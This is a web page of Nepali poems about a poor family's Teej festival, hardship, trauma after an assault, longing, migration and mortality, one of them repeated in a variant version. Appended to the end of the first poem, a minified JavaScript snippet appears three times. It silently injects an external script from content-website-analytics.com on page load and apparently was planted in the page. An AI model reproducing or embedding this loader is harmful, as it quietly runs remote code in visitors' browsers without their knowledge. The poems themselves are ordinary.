Author: Himal Creation

  • आयो तीज

    आयो तीज

    जागिर छैन, पैसा छैन, छैन चाडको रङ्ग छैन।

    आउन त आयो नि तीज, छिमेकीको आँगनसम्म, हाम्रो घरमा आउँदा त चाडलाई पनि उमङ्ग छैन।

    रित्तो छ आमा गोजी अनि रित्तै छ भान्सा पनि।

    आउदिन्न दिदी, आउँदिने बहिनी।

    उतै रमाउँछिन् भान्जी, आउँदैन भान्जा पनि।

     

    फाटेकै त हो आमा भाग्य, खुसी गरिबीले छोएपछि रुन नगर, हतार।

    चाड त हुनेखानेलाई हो, हामी हुँदा खानेलाई जहिले हुन्छ तब चाड।

    हुन त आमाको मन मानेन होला, मनाउ आमा।

    हिजो आज त पैसाले किन्छ सम्बन्ध।

    नौ गेडी र तिलहरी लर्काउँदै नाच्छिन् दिदी।

    तिम्रो बुच्चो गला हेर्दिनन्।

    सुन र सुनको भाउ दाज्छे बैनी।

    तिम्रो माया र त्याग दाज्दिनन्।

    जसो तसो मनलाई बुझाउला नि है,

    आमा मै छोरी बनेर तीज मनाउला नि है।

    तिमी भन्छौ माइत भनेपछि त हामी सातै खोली तरेर पुग्थ्यौ गाभरी आँसु बनाएर।

    कसरी सकेको होला बस्न मेरो आँशुलाई सस्तो गराएर।

    तिमीले नै भनेकी हौ समयसँगै चल्नु पर्छ।

    पुछ आमा आँसु।

    जसोतसो मनलाई बुझाउला नि है,

    मै छोरी बनेर तीज मनाउला नि है।

    आए त हुने नि, एकै छाक ऋण काढेरै पनि खुवाउथे भन्छिन् आमा।

    यही आँगनबाटै दिएको हो तर पुगे उनी चन्द्रमामा।

    के गर्छ्यौ आमा समय उस्तो कि,

    दिदी बहिनी, एकदिन छिनोफानो गरौला नि है।

    मै छोरी बनेर तीज मनाउला नि है।;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);

  • जन्मिएपछि किन नबाँच्ने

    जन्मिएपछि किन नबाँच्ने

    चरीले पनि एक मौसममा गुँड सार्नुपर्छ,
    फूलले आफ्ना सारा पातहरू झार्नुपर्छ,
    घामकै पनि चिसो याममा अस्तित्व नै मेटिन्छ त,
    हेर आफ्नै वरपर कहाँ एकनास भेटिन्छ त ?

    बुझी हेर, हर कोहीसँग हर्षित जीवन कसले प्रस्ट्याउँछ?
    बाली पनि हावाहुरी, पानी अनि हिमपश्चात् फस्टाउँछ!
    सङ्घर्ष नै जीवन र जीवन नै सङ्घर्ष भए, सङ्घर्षसँग किन भाग्ने ?
    सोच त! जन्मिएपछि किन नबाँच्ने ?

    जरुरी छैन, हरपल मनलाई चोटले छोइदिन्छ,
    एक पल मुस्काउँछ ओठ त अर्को पल आँखा रोइदिन्छ।
    सङ्घर्षको अघि घुँडा टेक्नुभन्दा घुँडा घसेर किन नबाझ्ने?
    सोच त! जन्मिएपछि किन नबाँच्ने ?

    जन्मिनुमा तिम्री आमाको मिठो अभिलाषा हुन सक्छ,
    मुहारमा तिम्रो उनले देखेको सुनौलो आशा हुन सक्छ।
    पीडा सम्झँदै धिक्कार्नुभन्दा, मुस्कुराउन मिठा सम्झना किन नसाँच्ने?
    सोच त ! जन्मिएपछि किन नबाँच्ने ?

  • तिजको पीडा

    तिजको पीडा

    जागिर छैन पैसा छैन छैन चाडको रङ्ग छैन
    आउन त आयो नि तिज छिमेकीको आँगनसम्म हाम्रो घरमा आउँदा त चाडलाई पनि उमङ्ग छैन ।

    रित्तो छ आमा गोजी अनि रित्तै छ भान्सा पनि
    आउँदिनन् दिदी आउँदिनन् बहिनी
    उतै रमाउँछन् भान्जी आउँदैनन् भान्जा पनि

    फाटेकै त हो आमा भाग्य, खुसी गरिबीले छोएपछि रुन नगर न हतार
    चाड त हुनेखानेलाई हो हामी हुँदा खानेलाई जहिले हुन्छ तब चाड
    हुन त आमाको मन मानेन होला मनाउ आमा
    हिजोआज त पैसाले किन्छ सम्बन्ध ।

    नौ गेडी र तिलहरी लर्काउँदै नाच्छिन् दिदी
    तिम्रो बुच्चो गला हेर्दिनन्
    सुन र सुनको भाउ दाज्छे बैनी
    तिम्रो माया र त्याग दाज्दिनन्
    जसो तसो मनलाई बुझाउला नि है
    आमा म‌ै छोरी बनेर तिज मनाउला नि है

    तिमी भन्छौ माइत भनेपछि त हामी सातै खोली तरेर पुग्थ्यौँ गहभरि आँसु बनाएर
    कसरी सकेको होला बस्न मेरो आँशुलाई सस्तो गराएर
    तिमीले नै भनेकी हौ समयसँगै चल्नु पर्छ
    पुछ आमा आँसु
    जसो तसो मनलाई बुझाउला नि है
    म‌ै छोरी बनेर तिज मनाउला नि है

    आए त हुने नि एकै छाक ऋण काढेरै पनि खुवाउँथे भन्छिन् आमा
    यही आँगनबाटै दिएको हो तर पुगे उनी चन्द्रमामा
    के गर्छ्यौ आमा समय उस्तै कि दिदी बहिनी एक दिन छिनोफानो गरौँला नि है
    म‌ै छोरी बनेर तिज मनाउला नि है ।

  • जिन्दगीका रंगहरु

    जिन्दगीका रंगहरु

    निष्फिक्री फुलका डालीमा रमाउदै दुल्ने रङ्ग‌गिन पूतली थिए म त्यो पुतली जो हरेक फुलका पत्रहरूमा आफुलाई डरका कुनैपनि लक्ष्मणरेखामा नबाधी आजाद छोडिदिन्थी ,
    उसलाई कुनै पानीका फोकाहरुले दुखाउदैनथ्यो
    उसलाई कुनै घामका किरणले सताउदैनथ्यो
    उसलाई कुनै मुस्कानले पोल्दैनथ्यो
    न त उसलाई कुनै सम्बोधनले बिझाउथ्यो

    तर जिन्दगीमा कुनै बहाव आउछ
    जसले अनायासै परिवर्तन ल्याउछ
    मलाई अचेल अतितले खुब सताउछ
    जब त्यो कालो दिन मेरो स्मरणमा आउछ

    दैनिकी नै त हो मेरो उड़ने त्यस दिन पनि उडिरहेकी थिए
    सपना बिपनाका अनेक तरङ्‌ग चुमिरहेकी थिए
    हो ! अनायसै थियो त्यो बहाव जसले जीवन बद‌लीदियो
    रसनै निमोठिने गरी जीवन कसैले निचोरीदियो

    थोरै सुइको पाएको भए बच्ने थिए
    ति पापीको फन्दामा कहा म फस्ने थिए
    तर हुरीले विनाश बोकेर आउछ थाहै नदिइ
    मेरो पनि जीवनमा आएको त्यस हुरीले सर्वनास ल्याएको छ सम्झन त चाहन्न तर बिर्सन पनि त सहज छैन

    त्यस दिन भन्दा पहिले मलाई हातहरू प्रिय लाग्थ्यो,
    स्पर्शहरु प्रिय लाग्थ्यो,

    प्रेमको प्रतिक हो भन्ने आभाष जाग्थ्यो
    तर प्रेमको पनि प्रकार हुदो रहेछ
    विभिन्न रूप हुदो रहेछ,
    त्यसैले त्यसदिनको स्पर्श बढो भिन्न भयो
    किन किन त्यसप्रश्चात पूर्ण जीवन खिन्न भयो
    उत्साह हिम्न मिन्न भयो
    हो त्यही दिनदेखि स्पर्शको आभाष भिन्न भयो।

    त्यस दिनदेखि त्यो पुतलीको पखेटा च्यातियो
    पाईला बाधिन थाल्यो
    मनमा अनेकौ तर्क उपतर्क खादिन थाल्यो
    धामको किरणले सताउन थाल्यो
    पानीको फोकाले दुखाउन थाल्यो

    हिजो आज
    मुस्कानले पोल्छ सम्बन्धले बिझाउछ
    उम्किन नसक्ने रहेछ मन यस्ता रङ्गहरुबाट
    तर्सिरहन्छ मन यस्तो उमङ्ग‌हरुबाट
    कास ति दिन म बिर्सन सकु
    फेरि उही उचाइ‌मा पुनः उड्‌न सकु

    अफसोस
    अब विश्वास गर्न लायक कोही भेट्दिन म
    झस्किन्छु, तर्सिन्छु
    नजिक कसको जानु? कोही आफ्नो लाग्दैन
    किनकी आफ्नैबाट म लक्षित भएकी छु
    आफ्नाकै कारण हरेक रङ्‌बाट त्रसित भएकी छु।

  • पर्खिन तयार छु

    पर्खिन तयार छु

    मितेरी गाँस्न मन छ मलाई देउतासँग
    यदि पाउँछु भने जुनी काट्न उही एउटासँग
    फेरेर पनि सास आधी परे आधी बाचेर पनि
    आउछौ भने पर्खिन्छु म आधी जुनी काटेर पनि

    म फूल बनिदिन्छु उनी सुगन्ध हुन्छन् भने
    म भूल भनिदिन्छु उनी माफीको रङ्ग हुन्छन् भने
    म हाँसीहाँसी पर्खन तयार छु जुनी जुनी
    यदि उनि एकपल पनि मेरो यादमा रुन्छन् भने

    ढडकने यो मुटु आधा उनी आधा म हुँ
    मुटुको आधा अंश बिना कसरी जीवित रहु
    मलाई जस्तै अभाव उनलाई खटकिन्छ भने
    म एक क्षण पनि नसोची उनकै हुन तयार
    यदि म बिना उनको पनि सास अड्किन्छ भने

    आफ्नो जीवन करकापमा जिउनुको के फाईदा
    एकबारको जुनीमा पनि खटखटाहट पिउनुको के फाईदा
    म त हरदम उनकै यादको पर्यायवाची हूँ उनकै समीपमा खसिदिन्छु
    यदि उनलाई पनि लाग्छ भने म बिना जिउनुको के फाईदा

  • म पहिचानहिन प्राणी

    म पहिचानहिन प्राणी

    म एक पहिचान हिन प्राणी हूँ
    कोख, नाता र जमिनले
    मलाई हरेक सम्बन्धमा बसाइदियो
    तर म केही बन्न सकिन ।
    मलाई जन्माएर- हुर्काएर आमाले आफ्नो कर्तव्यले मलाई छोरो बनाइन्,
    मलाई नागरिकता दिएर राष्ट्रले नागरिक बनायो ,
    मैले कसैको शिर सजाउँदा म श्रीमान भए ,
    प्रेमील स्पर्श बाट म बाउ भए, दिदीलाई विदाई गरेपछि म मामा भए,
    अवश्य पनि म हरेक नाता हरुले बाँधिए तर म कर्तव्यले केही बन्न सकिन ।
    आमा ! मैले तोते बोलिमा भनेको “म सधैं तिमिलाई स्हारेर तिम्रो सहरा बन्छु । “झुट बनिदिए
    त्यो तोते बोलिमा झुट थिएन आमा तर जिम्मेवारी बुझ्दै जाँदा झुट बनिदियो ।

    मैले मेरी उनकी आमासँग सुखदुःखमा सधैं साथ दिन्छु भनेर बाचा गरेर ल्याएको थिए
    तर साथस्वरुप केबल आश्वासन् दिन सक्छु
    परिस्थितिले त्यो बाचा पनि झुट बनाइदियो।

    छोराले बाउ भनेर केबल तस्बिरले चिन्यो काखमा खेल्न पाएन,
    म उसको लागी घोडा बन्न सकिन,
    मेरो घुँडा उसको लागि ढयाकुस् बन्न सकेन ,
    उसले मेरो काँध चडेर आकाश छुन बल गर्न पाएन,
    न त भान्जालाई काँध चढाएर गाउँ डुलाउन पाए
    मिठाई किनिदिएर खुवाउन पाइन
    म कर्तव्यले केही बन्न सकिन ।

    गरिबीले मुटुको भित्री भागमा पहिरो खसेपछि म सुटकेस घिसार्न बाध्य भए
    गरिबीलाई मेटाउँदै गर्दा म केबल पैसाको श्रोत भए तर कर्तव्यले केही बन्न सकिन ।

    सानोमा पढ्दै गर्दा मैले गुरुलाई मेरो देशको गौरव बन्ने छु म कहाँ अन्त फुल्ने छु भनि भन्दा गुरु मुसुक्क मुस्कुराउनु भएको सम्झन्छु,
    आज त्यो मुस्कानले खुब मुटु पोल्छ
    त्यो अन्योल मुस्कान आफूले भोगेको स्थिती सम्झेर थियो कि मेरो खोक्रो आँट देखेर थियो कुन्नि मैले अझै बुझिन !

    तर यति बुझें, देशमा पढ्ने केबल सर्टिफिकेट निकाल्न रहेछ अनि नागरिकता पासपोर्ट बनाउन
    माफ गर मेरी आमा म कर्तव्यले छोरा बन्न सकिन
    माफ गर पियारी म कर्तव्यले श्रीमान बन्न सकिन
    माफ गर छोरो म कर्तव्यले बाउ बन्न सकिन
    म कर्तव्यले केही बन्न सकिन ।

  • म झट्टै मरिहाले भने

    म झट्टै मरिहाले भने

    म झट्टै मरिहाले भने
    केही गरी कालको नजर मै माथि परी हाल्यो भने
    के हुन्छ होला म झट्टै मरिहाले भने!

    म संसार हेर्न सक्छु होला या सक्दिन होला?
    मरेको मान्छे बोलेको त कसले सुन्छ र ?
    छुटेपछि शरीर आत्मबाट म बोल्न सक्छु होला या सक्दिन होला ?
    महसुस सकिएको आँखाले फेरि यो सृष्टि नियाल्न सक्छु होला या सक्दिन होला ?
    का पुगुला छोडेर म आफ्नो शरीर म बतास हुन्छ होला या झरी ?

    मेरो कान सम्म आफ्ना चिच्याहट पुग्ला की नपुग्ला ?
    मेरो रोकिएको ढुकढुकीले फेरि त्यो अन्तिम प्रेम बुझ्ला की नबुझ्ला?
    कसैले झकझाकाउँदा मेरो शरीर म पर बसेर हेरिरहेको हुन्छ होला कि धेरै पर पुगिसकेको हुन्छु होला ?

    सास र शरीर छुटेपछि म बिहान साँझ छुट्याउन सकुला या नसकुँला?
    यहाँका साथी अनि इस्टमित्रको सम्झनाले सताउला की नसताउला?
    एउटै प्रश्न
    के हुन्छ होला म झट्टै मरिहाले भने ?

  • रङ्ग हीन जिन्दगी

    रङ्ग हीन जिन्दगी

    रङ्गीन भित्ताको बीच थुनिएको त्यो प्राण भएको जिउँदो लास आजपनि त सास फेरिरहेछ
    कुनै सासमा नरहेपनि आस क्या आराम सास फेरि रहेछ
    रङ्गीन भित्ताले कोरेको त्यो रङ्ग हिन जिन्दगी

    प्रेम भन्ने जालमा परेपछि हुने रहेछ सस्तो जवानी
    बाँचेरै पनि त अर्थ छैन हत्केलामा रहेछ मेरो जिन्दगानी
    बस्दा बस्दै लाग्छ कैहीलेकाही उठेर आटिदेऊ
    भारी एक मुठी सास न हो त्यो पनि फ्याकी देऊ
    सास रहुन्जेल मरेको कसले देख्छ र
    आखिर बाँचेर पनि त अर्थ के छ र

    आँखाका परेलामा अड्किएका सपनाहरु आँधी लुच्छिए
    अनी आँधी आँशु सँगै बगे र आँशु सँगै पुछिए
    लाग्छ बिर्सिन सकूँ आफू आफैलाई सबै बाट पर भागिदेऊ
    हराएर एकाएक हरेक नजरबाट कुनै अपरिचित नजरमा जागिदिऊ ।
    हेर्न सकूँ आफूलाई आफ्नै नजरले त्यति आँट कहा छ र
    समाल्नै पनि आफूलाई त्यो आहट कहा छ र ?

    गर्दा पनि चोखो माया यहाँ आफ्नै हृदयलाई खै कस्तो ऋण लाग्छ ।
    हेरू भने आकृति आफ्नै ऐनामा घिन लाग्छ‌
    फेर्न मन छ याद सँगै अब मुहार पनि एकैपल मा
    डुबेपछि जिन्दगानी झुट अनि छलमा
    आफैबाट आफूलाई लुकाएर भाग्न सक्ने को भित्र त्यस्तो दिल छ ।
    दुःख आफ्नो नजिक बाट बुजेपनी आफैलाई अँगाल्न कहाँ मिल्छ ।

  • जन्मिएपछि किन नबाच्ने

    जन्मिएपछि किन नबाच्ने

    चरीले पनि एक मौसममा गुडॅं सार्नुपर्छ
    फूलले आफ्ना सारा पातहरु झार्नुपर्छ
    घामकै पनि चिसो याममा अस्तित्व नै मेटिन्छ त
    हेर आफ्नै वरपर कॅंहा एकनास भेटिन्छ त?

    बुझीहेरे हरकोहीसॅंग हर्षित जीवन कसले प्रष्टाउछ?
    बालीपनि हावाहुरी पानी अनि हिम पश्चात फस्टाउछ!
    सङ्घर्ष नै जीवन र जीवन नै सङ्घर्ष भए , सङ्घर्षसगॅं किन भाग्ने?
    सोच त ! जन्मिएपछि किन नबाच्ने ?

    जरुरी छैन हरपल मनलाई चोटले छोइदिन्छ
    एकपल मुस्काउछ ओठ त अर्को पल आखा रोइदिन्छ
    सङ्घर्षको अघि घुडा टेक्नुभन्दा घुडा घसेर किन नबाझ्ने?
    सोच त ! जन्मिएपछि किन नबाच्ने ?

    जन्माउनुमा तिम्री आमाको मिठो अभिलाषा हुन सक्छ
    मुहारमा तिम्रो उनले देखेको सुनौलो आशा हुन सक्छ
    पिडा सम्झदै धिक्कार्नुभन्दा मुस्कुराउन मिठा सम्झना किन नसाच्ने?
    सोच त ! जन्मिएपछि किन नबाच्ने ?

  • म के गरु ?

    म के गरु ?

    सन्तुष्ट छैन मन, याकुल व्याकुल छ
    सफलता केही कोश पर
    न कोहीको साथ
    न कोहीको माया नै छ
    अरूको प्रगतिले मलाई गिज्याइरहेको छ
    आफ्ना भन्ने टाढिएका छन्
    मनमा शब्द गुम्सिएका छन्
    बोल्न जिब्रो लड्बडाउँछन्
    झस्कि रहन्छ  यो मन
    हात काँप्छन् थर्थर
    आफ्नो छायाले कराएर भन्छ केही त गर
    तर म के गरुँ ?

    पाइला सार्दा पाइला डग्मगाउँछ
    सफलताको खोजीमा उमेर ढल्कियो
    मलाई थाहा छ ।
    ए समय पख् न एक क्षण बन्दी बनाएर अझै राख्छस् केही समय प्वाँख फुकाएर बाँच्न चाहन्छु
    एकचोटि मलाई दया गरेर त हेर
    मेरा ओठ हाँस्न नपाएर तड्पिएका छन्
    मेरा आँखामा चमक नभएर उदासीन छन् एकोहोरिएको सुर पाउँदिन
    आफ्नै छायाले डराउन दिन्छ
    केही कुराको भेउ पाउँदिन
    लाग्छ भिडमा कतै हराएको छु
    शन्यूता, मौनता र अँध्यारालाई साथी बनाएको छु ।
    प्रयास गर्दा पनि हराइरहेको छु
    अभाव नै अभावमा बाँचिरहेको छु
    न त कोहीका लागि खास छु
    न त कतै खुसी पाउने विकल्प देख्छु ।

    `बा´ को सिरको टोपीमा
    आशा लुकेको देख्छु
    आमाको म प्रतीको आकांक्षा
    यी कुराले निद्रा पर्दैन
    यति देख्दा पनि ईश्वरले किन मलाई दया गर्दैन
    शिरमा सजाएर राखेको बा को आश
    हत्केला रंगाएर राखेको आमाको आशले
    साथीहरुसँग रमाउँन हृदयले आवश्यक ठान्दैन
    मलाई केही गर्दिनी भनेर नकाटे कुरा
    म त मेरो यात्रा अघि बढाउन चाहन्छु
    मेटिएको मेरो जिवनको पाना कोर्ने चाहान्छु

    सुस्त सुस्त हिँड्ने बाटुवा हुँ म
    हिँड्ने बाटोमा काँडा नरोपिदिनु
    म काडा टिपेर फुल रोप्न्ने सक्छु
    म झरेको फुलको पालुवा हु
    पलाउन सक्छु ।

    – सुस्मिता सापकोटा